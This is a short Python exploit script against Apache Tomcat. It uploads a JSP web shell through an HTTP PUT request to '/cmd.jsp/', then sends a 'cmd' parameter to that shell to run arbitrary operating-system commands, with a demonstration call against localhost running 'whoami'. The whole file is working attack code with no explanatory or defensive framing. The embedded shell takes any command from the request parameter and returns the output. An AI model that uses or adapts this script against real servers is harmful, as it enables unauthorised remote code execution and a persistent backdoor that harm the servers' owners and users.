import requests

# tomcat putshell
# RCE root shell

def attack(host,cmd):
    SHELL = '''<%@ page import="java.util.*,java.io.*"%>
    <%
    if (request.getParameter("cmd") != null) {
            Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while ( disr != null ) {
                    out.println(disr); 
                    disr = dis.readLine(); 
                    }
            }
    %>'''
    url = "http://"+host+"/cmd.jsp/"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    upl = requests.put(url,headers=headers,data=SHELL)
    #print(upl.text)
    url2 = "http://{}/cmd.jsp?cmd={}".format(host,cmd)
    r = requests.get(url2)
    return r.text.strip()


if __name__ == '__main__':
    print(attack("localhost:8080","whoami"))